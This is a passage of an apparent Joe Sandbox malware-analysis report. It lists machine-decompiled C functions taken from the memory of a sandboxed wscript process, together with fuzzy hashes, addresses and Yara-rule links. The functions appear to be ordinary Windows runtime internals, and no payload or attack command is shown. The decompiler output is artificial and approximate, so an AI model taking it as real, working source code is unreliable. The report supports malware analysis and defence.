0x0595efbe
0x0595efbe
0x0595efc1
0x00000000
0x0595efc1
0x0595efbc
0x0595efaa
0x0595ef91

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: d285bf3a5cde67cb4d392ab10f5250502fe2f627b75aa3a93ed74223d3010017
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 68510771A04245DFDB10CB64C1C4BAEBBBBBF05334F1881A8EC4553281C776AA99C751

Uniqueness

Uniqueness Score: -1.00%

Function 05A1740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E05A1740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0599D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0598F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L05964620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L05964620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0598F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L05964620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x05a1740d
0x05a1740d
0x05a17412
0x05a17413
0x05a17416
0x05a17418
0x05a1741c
0x05a1741f
0x05a17422
0x05a17422
0x05a17428
0x05a1742a
0x05a1742a
0x05a17451
0x05a17432
0x05a1744f
0x05a1744f
0x00000000
0x05a17434
0x05a17438
0x05a17443
0x05a17517
0x05a17517
0x05a1751a
0x05a17535
0x05a17520
0x05a17527
0x05a1752c
0x05a17531
0x05a17533
0x00000000
0x05a17533
0x00000000
0x05a17531
0x05a1754b
0x05a1754f
0x05a1755c
0x05a1755c
0x05a1755f
0x05a17560
0x05a17561
0x05a17562
0x05a17563
0x05a17568
0x05a1756a
0x05a1756c
0x05a1756d
0x05a1756d
0x05a1756f
0x05a17572
0x05a17574
0x05a17577
0x05a1757c
0x05a1757f
0x00000000
0x05a17551
0x05a17551
0x05a17551
0x05a17553
0x05a17553
0x05a17449
0x05a17449
0x05a1744c
0x05a1744c
0x00000000
0x05a1744c
0x05a17443
0x05a1750e
0x05a17514
0x05a17514
0x05a17455
0x05a17469
0x05a1746d
0x00000000
0x05a17473
0x05a17473
0x05a17476
0x05a17480
0x05a17484
0x05a1748e
0x05a17493
0x05a17493
0x05a17496
0x05a17499
0x05a174a1
0x05a174b1
0x05a174b5
0x00000000
0x05a174bb
0x05a174c1
0x05a174c1
0x05a174c4
0x05a174c5
0x05a174c6
0x05a174c7
0x05a174c8
0x05a174cd
0x00000000
0x05a174d3
0x05a174d3
0x05a174d6
0x05a174d8
0x05a174db
0x05a174dd
0x05a174e0
0x05a174e7
0x05a174ee
0x05a174ee
0x05a174f4
0x05a174f9
0x00000000
0x05a174fb
0x05a174fb
0x05a174fd
0x05a17500
0x05a17503
0x05a17505
0x05a17505
0x05a174f9
0x00000000
0x05a174cd
0x05a174b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: eaa76e314129253bd2470030eb3759c72cf06fb5166e601a16d5ce1870250f3f
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 80519C71600606EFCB15CF54C880EA6BBB5FF45314F14C0AAE9099F212E371EA46CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 05972990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E05972990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x5a1ff00);
				E0599D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x5921664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0598E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x5921668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E059C51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x592166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E05972AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E05956600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E05972C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0595EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E05972AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E05972C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E05972ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0599D0D1(_t62);
				goto L28;
			}

0x05972990
0x05972992
0x05972997
0x059729a3
0x059729a6
0x059729ab
0x059729ad
0x059729b2
0x059b5c80
0x059729b8
0x059729b8
0x059729bb
0x059729c0
0x059729c5
0x059729c6
0x059729c6
0x059729cb
0x00000000
0x00000000
0x059729cd
0x059729d0
0x059729d9
0x059729db
0x059729dd
0x05972a7f
0x05972a84
0x05972a87
0x05972a89
0x059b5ca1
0x059b5ca3
0x00000000
0x05972a8f
0x05972a8f
0x00000000
0x05972a8f
0x00000000
0x059729e3
0x059729e3
0x059729e3
0x00000000
0x059729e3
0x059729dd
0x00000000
0x059729db
0x059729e6
0x059729e9
0x059729eb
0x059729ed
0x059729f3
0x059729f5
0x059729f8
0x059729fa
0x05972a97
0x05972a9a
0x05972a9d
0x05972add
0x00000000
0x05972a9f
0x05972aa2
0x05972aa5
0x05972aa8
0x05972aab
0x059b5cab
0x059b5caf
0x059b5cc5
0x059b5cda
0x059b5cdc
0x059b5cdf
0x059b5ce5
0x00000000
0x059b5ceb
0x059b5ced
0x059b5cee
0x00000000
0x059b5cee
0x059b5cb1
0x059b5cb4
0x059b5cb9
0x059b5cbb
0x00000000
0x059b5cbd
0x059b5cbd
0x00000000
0x059b5cbd
0x059b5cbb
0x05972ab1
0x05972ab1
0x05972ac4
0x05972ac6
0x05972ac6
0x00000000
0x05972ac6
0x05972aab
0x00000000
0x05972a00
0x05972a09
0x05972a0e
0x05972a21
0x05972a24
0x05972a35
0x05972a3a
0x05972a3d
0x05972a42
0x05972a59
0x05972a59
0x05972a5c
0x05972a5f
0x05972a5f
0x059729fa
0x059729f3
0x05972a64
0x05972a64
0x05972a6b
0x05972a6b
0x05972a6d
0x05972a72
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0960c393fc0fe5b29cc1d9062d92e3d6e20956af976bf5df7f5ae898583c234a
Instruction ID: 5236e3019474ecf8bb6f3efe9c6af76aa40996f87b5d8b61272121298c8a52b8
Opcode Fuzzy Hash: 0960c393fc0fe5b29cc1d9062d92e3d6e20956af976bf5df7f5ae898583c234a
Instruction Fuzzy Hash: 46518A75A1020DDFDF29DF55C980AEEBBBABF48710F158066E805AB250D3359D52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05974D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E05974D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x5a3d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0598FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x5a37bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0598B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L05964620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0594CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0598B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0598F380(_t67 + 0xc, 0x5925138, 0x10) == 0) {
								 *0x5a360d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E05974F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E05974E70(0x5a386b0, 0x5975690, 0, 0) != 0) {
					_t46 = E0594CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x05974d3b
0x05974d4d
0x05974d53
0x05974d58
0x05974d65
0x05974d6c
0x05974d71
0x05974d77
0x05974d7f
0x05974d8c
0x05974d8e
0x05974dad
0x05974db0
0x05974db7
0x05974db8
0x05974db9
0x05974dba
0x05974dbb
0x05974dc1
0x05974dc8
0x05974dcc
0x05974dd5
0x05974dde
0x05974ddf
0x05974de0
0x05974de1
0x05974de6
0x05974de7
0x05974de9
0x05974df3
0x00000000
0x00000000
0x059b6c7c
0x059b6c8a
0x059b6c8a
0x059b6c9d
0x059b6ca7
0x059b6cac
0x059b6cb2
0x059b6cb9
0x00000000
0x059b6cbf
0x059b6cbf
0x00000000
0x059b6cbf
0x059b6cb9
0x05974dfb
0x059b6ccf
0x059b6cd3
0x05974e32
0x05974e39
0x059b6ce0
0x059b6cf2
0x059b6cf2
0x059b6ce0
0x05974e3f
0x05974e41
0x05974e51
0x05974e51
0x05974e03
0x05974e03
0x05974e09
0x05974e0f
0x05974e57
0x00000000
0x00000000
0x05974e1b
0x05974e30
0x05974e5b
0x05974e5b
0x00000000
0x05974e30
0x05974e11
0x05974e11
0x05974e16
0x00000000
0x05974e16
0x05974e01
0x00000000
0x05974e01
0x05974da5
0x059b6c6b
0x00000000
0x05974dab
0x05974dab
0x00000000
0x05974dab

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b30fd1fcadeec8e85d65c8bfb377331a6673a45cd958aa7ccf4aa0c26f2b8b95
Instruction ID: eb88a74e8adee5dc6274570980628ed2128485207c070e261316c1a61adfe9e8
Opcode Fuzzy Hash: b30fd1fcadeec8e85d65c8bfb377331a6673a45cd958aa7ccf4aa0c26f2b8b95
Instruction Fuzzy Hash: 4D41B271B40318AFEF21DF14CC85FBAB7AAEF45620F04049AE9499B281D7B4ED44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05974BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E05974BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x5a3d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0594CC50(_t86);
					L11:
					return E0598B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x5a38504
				E05962280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0598FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0598B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L05964620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0594CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x5a38504
								E0595FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E05974F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x05974bad
0x05974bbf
0x05974bc2
0x05974bc6
0x05974bcd
0x05974bd9
0x059b67fe
0x059b6800
0x05974ccc
0x05974ccd
0x05974cb7
0x05974cc9
0x05974cc9
0x05974bdf
0x05974be5
0x00000000
0x00000000
0x05974beb
0x05974bef
0x00000000
0x00000000
0x05974bf5
0x05974bf9
0x05974c06
0x05974c0b
0x05974c17
0x05974c1c
0x05974c1f
0x05974c25
0x05974c33
0x05974c3d
0x05974c40
0x05974c43
0x05974c47
0x05974c4d
0x05974c53
0x05974c54
0x05974c55
0x05974c56
0x05974c5b
0x05974c5c
0x05974c63
0x05974c6b
0x00000000
0x00000000
0x059b6776
0x059b6784
0x059b6784
0x059b679f
0x059b67a7
0x059b67af
0x059b67ce
0x00000000
0x059b67b1
0x059b67b7
0x059b67b8
0x059b67c1
0x059b67d3
0x059b67d9
0x059b67dd
0x05974c94
0x05974c94
0x05974c98
0x05974c9c
0x05974ca3
0x059b67f4
0x059b67f4
0x05974cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x05974cb5
0x05974c79
0x05974c7e
0x05974c89
0x05974c8b
0x05974c8f
0x05974c8f
0x00000000
0x05974c89
0x059b67c3
0x00000000
0x059b67c3
0x059b67af
0x05974c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5de1d653a957cbd14ddc4011f93d7b9ee0ee2bd605894032ef2a390ebd69bef
Instruction ID: b70da68db9e5a9d9b031679a7c4569fefab6cc32a0d413df90c0415106b2bc5c
Opcode Fuzzy Hash: b5de1d653a957cbd14ddc4011f93d7b9ee0ee2bd605894032ef2a390ebd69bef
Instruction Fuzzy Hash: 62418235A403289BDF21DF68C984FEA77B9FF45710F0504A6E909AB241DB74EE84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05958A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05958A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x5a3d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0598B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0595E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x5921180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E05971DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E05983C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E05958999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x05958a0a
0x05958a1c
0x05958a23
0x05958a2e
0x05958a30
0x05958a36
0x05958a3c
0x05958a3e
0x05958a4a
0x05958a52
0x05958a9c
0x05958aae
0x05958a58
0x05958a5e
0x05958a6a
0x05958a6f
0x05958a75
0x05958a7d
0x05958a85
0x05958a86
0x05958a89
0x05958a93
0x05958a99
0x05958a9b
0x00000000
0x05958aaf
0x05958abe
0x05958ac3
0x05958acb
0x05958ad7
0x05958ae0
0x05958af1
0x00000000
0x05958af1
0x05958acd
0x05958ad5
0x05958afb
0x05958afd
0x05958aff
0x05958b07
0x05958b22
0x05958b24
0x05958b2a
0x05958b2e
0x05958b3f
0x05958b78
0x05958b41
0x05958b52
0x05958b54
0x05958b5c
0x05958b74
0x05958b74
0x05958b5c
0x05958b3f
0x05958b5e
0x05958b61
0x05958b64
0x05958b64
0x05958b6c
0x05958b6c
0x05958b11
0x059a9cd5
0x059a9cd5
